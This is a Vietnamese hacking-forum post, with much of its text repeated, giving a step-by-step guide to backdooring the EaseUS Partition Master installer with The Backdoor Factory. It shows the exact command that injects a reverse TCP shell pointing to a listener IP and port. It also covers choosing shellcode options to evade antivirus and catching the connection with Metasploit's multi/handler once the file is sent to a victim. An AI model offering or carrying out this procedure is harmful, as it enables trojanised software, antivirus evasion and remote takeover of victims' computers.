DDos
VIP Members
-
22/10/2013
-
524
-
2.189 bài viết
Hack máy tính sử dụng một backdoor
The backdoor factory là một shellcode cho phép bạn tiêm vào bất kỳ một file thực thi chạy trên windows 32/64bit, mà file thực thi vẫn chạy bình thường. Công cụ này được viết bởi nhà nghiên cứu bảo mật Joshua Pitts được trình diễn tại hội nghị bảo mật Debycon 2013.
Các bạn có thể tìm hiểu thêm công cụ này trong slide mà tác giả đã chia sẻ:
Bước 2: Mở terminal và chạy ứng dụng bằng lệnh: ./backdoor.py
Các tùy chọn của công cụ
Trong ví dụ này, mình sẽ gắn backdoor vào file cài đặt của phần mềm phân chia ổ đĩa khá nổi tiếng là EaseUS Partition Master Home Edition.
Bước 3: Mình sử dụng lệnh: ./backdoor.py -f '/root/Downloads/bypass antivirus/backdoor/epm.exe' -H 192.168.1.6 -P 443 -s reverse_shell_tcp
Bước 4: Các bạn lựa chọn các tùy chọn cho việc thay đổi shellcode gắn vào file thực thi để vượt qua sự phát hiện phần mềm diệt virus
Bước 5: Sau khi hoàn thành các tùy chọn, file thực thi mà đã được nhúng backdoor sẽ được tạo ra ở đường dẫn
/backoor/backdoored
Bước 6: Bây giờ mình sẽ thử scan file đã được backdoored này, sử dụng dịch vụ scan online Total virus. Và đây là kết quả:
Bước 7: Mình mở metasploit và sử dụng tạo khai thác exploit/multi/hanlder để lắng nghe kết nối từ nạn nhân. Sau đó mình sẽ gửi file thực thi này đến cho nạn nhân. Trên máy nạn nhân, có sử dụng phần mềm diệt virus AVG 2014 Free đã update đầy đủ cơ sở dữ liệu.
Bước 8: Khi nạn nhân thực thi file, quá trình khai thác của bạn đã thành công:
Các bạn có thể tìm hiểu thêm công cụ này trong slide mà tác giả đã chia sẻ:
HTML:
http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
Cách sử dụng công cụ:
Bước 1: Tải công cụ và giải nén ta được:
HTML:
https://github.com/secretsquirrel/the-backdoor-factory/archive/1af848015c49a0654bbae721388edf426ca80eda.zip
Bước 2: Mở terminal và chạy ứng dụng bằng lệnh: ./backdoor.py
Các tùy chọn của công cụ
Trong ví dụ này, mình sẽ gắn backdoor vào file cài đặt của phần mềm phân chia ổ đĩa khá nổi tiếng là EaseUS Partition Master Home Edition.
Bước 3: Mình sử dụng lệnh: ./backdoor.py -f '/root/Downloads/bypass antivirus/backdoor/epm.exe' -H 192.168.1.6 -P 443 -s reverse_shell_tcp
Bước 4: Các bạn lựa chọn các tùy chọn cho việc thay đổi shellcode gắn vào file thực thi để vượt qua sự phát hiện phần mềm diệt virus
Bước 5: Sau khi hoàn thành các tùy chọn, file thực thi mà đã được nhúng backdoor sẽ được tạo ra ở đường dẫn
/backoor/backdoored
Bước 6: Bây giờ mình sẽ thử scan file đã được backdoored này, sử dụng dịch vụ scan online Total virus. Và đây là kết quả:
Bước 7: Mình mở metasploit và sử dụng tạo khai thác exploit/multi/hanlder để lắng nghe kết nối từ nạn nhân. Sau đó mình sẽ gửi file thực thi này đến cho nạn nhân. Trên máy nạn nhân, có sử dụng phần mềm diệt virus AVG 2014 Free đã update đầy đủ cơ sở dữ liệu.
Bước 8: Khi nạn nhân thực thi file, quá trình khai thác của bạn đã thành công:
Chỉnh sửa lần cuối bởi người điều hành: